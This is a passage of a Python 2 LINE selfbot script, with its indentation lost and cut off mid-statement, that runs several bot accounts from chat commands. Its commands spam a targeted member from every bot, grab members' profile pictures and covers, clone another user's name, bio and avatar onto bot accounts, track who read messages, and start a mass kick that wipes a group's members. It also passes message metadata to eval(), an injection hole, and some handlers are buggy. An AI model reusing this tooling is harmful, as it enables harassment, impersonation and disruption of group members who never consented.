cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Auto leave:on"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["Auto leave:off"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
#===============================================================
elif msg.text in ["Auto like:on"]:
if msg.from_ in admin:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Auto like:off"]:
if msg.from_ in admin:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
#==========================================================
elif msg.text in ["Settings"]:
if msg.from_ in admin:
print "Setting pick up..."
md="list of bot settings\n\n"
if wait["likeOn"] == True: md+="Auto like : on\n"
else:md+="Auto like : off\n"
if mimic["copy"] == True: md+="Mimic : on\n"
else:md+="Mimic : off\n"
if wait["winvite"] == True: md+="Invite : on\n"
else:md+="Invite : off\n"
if wait["pname"] == True: md+="Namelock : on\n"
else:md+="Namelock : off\n"
if wait["contact"] == True: md+="Notice : on\n"
else: md+="Notice : off\n"
if wait["autoJoin"] == True: md+="Auto join : on\n"
else: md +="Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+="Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "Group cancel : off\n"
if wait["leaveRoom"] == True: md+="Auto leave : on\n"
else: md+="Auto leave : off\n"
if wait["clock"] == True: md+="Clock Name : on\n"
else:md+="Clock Name : off\n"
if wait["autoAdd"] == True: md+="Auto add : on\n"
else:md+="Auto add : off\n"
if wait["commentOn"] == True: md+="Comment : on\n"
else:md+="Comment : off\n"
if wait["Backup"] == True: md+="Backup : on\n"
else:md+="Backup : off\n"
if wait["qr"] == True: md+="Protect QR : on\n"
else:md+="Protect QR : off\n"
if wait["welcomemsg"] == True: md+="welcome message : on\n"
else:md+="welcome message : off\n"
if wait["protectionOn"] == True: md+="Protection : hight\n\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="Protection : low\n\n"+ datetime.today().strftime('%H:%M:%S')
if wait["autorein"] == True: md+="auto reinvite : on\n"
else:md+="auto reinvite : off\n"
if wait["pelaku"] == True: md+="shows offender : on\n"
else:md+="shows offender : off\n"
if wait["tag"] == True: md+"Notag : on\n"
else:md+="Notag : off\n"
cl.sendText(msg.to,md)
#========================================
#------------------------------------------------
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["PING","Ping","ping"]:
if msg.from_ in admin:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
kk.sendText(msg.to,"PONG double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
ks.sendText(msg.to,"PONG double thumbs upHar Har")
kt.sendText(msg.to,"PONG double thumbs upHar Har")
cl.sendText(msg.to,"PONG double thumbs upHar Har")
elif "Info @" in msg.text:
if msg.from_ in admin:
nama = msg.text.replace("Info @","")
target = nama.rstrip(' ')
tob = cl.getGroup(msg.to)
for g in tob.members:
if target == g.displayName:
gjh= cl.getContact(g.mid)
try:
cover = cl.channel.getCover(g.mid)
except:
cover = ""
cl.sendText(msg.to,"[Display Name]:\n" + gjh.displayName + "\n[Mid]:\n" + gjh.mid + "\n[BIO]:\n" + gjh.statusMessage + "\n[pict profile]:\nhttp://dl.profile.line-cdn.net/" + gjh.pictureStatus + "\n[Cover]:\n" + str(cover))
else:
pass
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Auto add:on"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
elif msg.text in ["Auto add:off"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
#========================================
elif "pam @" in msg.text:
_name = msg.text.replace("pam @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Spammed")
ki.sendText(g.mid,"Spammed")
kc.sendText(g.mid,"Spammed")
ks.sendText(g.mid,"Spammed")
kk.sendText(g.mid,"Spammed")
kt.sendText(g.mid,"Spammed")
ct.sendText(msg.to,"done spam bossque")
#========================================
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif "Message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Message:","")
cl.sendText(msg.to,"bot message\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Add message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Add message:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"done。\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["Comment:on"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Comment:off"]:
if msg.from_ in admin:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Check comment"]:
if msg.from_ in admin:
cl.sendText(msg.to,"message comment\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
uye.updateGroup(x)
gurl = uye.reissueGroupTicket(msg.to)
uye.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================
elif msg.text.lower() == 'responsename':
if msg.from_ in admin:
profile = cl.getProfile()
text = profile.displayName + " Cʳᵒᵗ"
cl.sendText(msg.to, text)
profile = ki.getProfile()
text = profile.displayName + " Cʳᵒᵗ"
ki.sendText(msg.to, text)
profile = kk.getProfile()
text = profile.displayName + " Cʳᵒᵗ"
kk.sendText(msg.to, text)
profile = kc.getProfile()
text = profile.displayName + " Cʳᵒᵗ"
kc.sendText(msg.to, text)
profile = ks.getProfile()
text = profile.displayName + " Cʳᵒᵗ"
ks.sendText(msg.to, text)
profile = kt.getProfile()
text = profile.displayName + " Cʳᵒᵗ"
kt.sendText(msg.to, text)
#========================================
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist s")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Clock:on","Clock on","Jam on","Jam:on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Clock:off","Clock off","Jam off","Jam:off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif "Cc: " in msg.text:
n = msg.text.replace("Cc: ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"Changed to:\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Refresh to update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
#========================================
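# Profile stealing: Steal cover @, Midpict: and Steal pict fetch another member's cover or avatar by display name or mid.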
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
elif "Pict group " in msg.text:
saya = msg.text.replace('Pict group ','')
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
gna = cl.getGroup(i)
if h == saya:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["My name"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["My bio"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["My pict"]:
h = cl.getContact(mid)
cl.sendImageWithUrl(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["My cover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
elif "Pap set:" in msg.text:
wait["Pap"] = msg.text.replace("Pap set:","")
cl.sendText(msg.to,"Pap Has Ben Set To")
elif msg.text in [".Pap","Pap"]:
cl.sendImageWithURL(msg.to,wait["Pap"])
#==≠============================================
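# Vn <text>: text-to-speech via gTTS (defaults to Indonesian); Kalender prints the current date and time with Indonesian day/month names.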
elif "Vn " in msg.text:
say = msg.text.replace("Vn ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif msg.text in ["Kalender","/waktu"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
blan = bulan[int(bln) - 1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
elif "Creat group" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("New", mi_d)
cl.sendText(msg.to,"Succes creat new group")
elif msg.text in ["Like:friend", "Bot like temen"]:
print "[Command]Like executed"
cl.sendText(msg.to,"pertamax")
try:
likefriend()
except:
pass
elif "Cek zodiak " in msg.text:
tanggal = msg.text.replace("Cek zodiak ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"Tanggal Lahir: "+lahir+"\n\nUsia:"+usia+"\n\nUltah: "+ultah+"\n\nZodiak: "+zodiak)
elif "Steal " in msg.text:
if msg.from_ in admin:
salsa = msg.text.replace("Steal ","")
Manis = cl.getContact(salsa)
Imoet = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cover = cl.channel.getCover(Manis)
except:
cover = ""
cl.sendText(msg.to,"Gambar Foto Profilenya")
cl.sendImageWithURL(msg.to,Imoet)
if cover == "":
cl.sendText(msg.to,"User tidak memiliki cover atau sejenisnya")
else:
cl.sendText(msg.to,"Gambar Covernya")
cl.sendImageWithURL(msg.to,cover)
#===============================================
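# Sp / Speed: rough response-time check; the reported value only measures the local 0.02 s sleep, not network latency.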
elif msg.text in ["Sp"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Pᵉˡᵃⁿ-Pᵉˡᵃⁿ Sᵃʸᵃⁿᵍ...😃")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
print "[Command]Speed executed"
elif msg.text in ["Speed","speed"]:
if msg.from_ in admin:
start = time.time()
print("Speed")
cl.sendText(msg.to, "Pᵉˡᵃⁿ-Pᵉˡᵃⁿ Sᵃʸᵃⁿᵍ...😃")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
ki.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
kk.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
kc.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
ks.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
kt.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
#========================================
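# Backup save commands: each bot dumps its display name, status message and picture status into plain .txt files for the restore commands further below.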
elif msg.text in ["My backup"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = kt.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
kt.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
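# Clone commands: copy the display name, status message and profile picture of the mentioned user onto the chosen bot account.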
elif "My clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kt.getContact(target)
X = contact.displayName
profile = kt.getProfile()
profile.displayName = X
kt.updateProfile(profile)
kt.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kt.getProfile()
lol.statusMessage = Y
kt.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kt.updateProfilePicture(P)
except Exception as e:
kt.sendText(msg.to, "Failed!")
print e
#=================================================
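# Backup restore commands: re-apply the profile data saved by the backup commands above; note these match by substring, so the exact text "My backup" is caught by the save handler earlier in the chain.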
elif "My backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = kt.getProfile()
profile.displayName = x
kt.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kt.getProfile()
cak.statusMessage = y
kt.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
kt.updateProfilePicture(p)
kt.sendText(msg.to, "Succes")
except Exception as e:
kt.sendText(msg.to,"Gagagl!")
print e
#=================================================
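# Lurking sets a read point for the current chat; Lurk later lists the members whose read receipts were recorded by the op.type 55 handler below.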
elif msg.text == "Lurking":
if msg.from_ in admin:
cl.sendText(msg.to, "Set point.")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Lurk":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═══════════════%s\n╠════════════════\n%s╠═══════════════\n║Readig point creation:\n║ [%s]\n╚════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "anda slah ketik-_-")
#========================================
#---------------Wipe the group without kicking fellow Bots/Admins----------#
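# #Bubar kicks every member whose display name contains the given text, skipping anyone listed in Bots or admin.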
elif "#Bubar" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("#Bubar","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Pᵉˡᵃⁿ-Pᵉˡᵃⁿ Sᵃʸᵃⁿᵍ ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
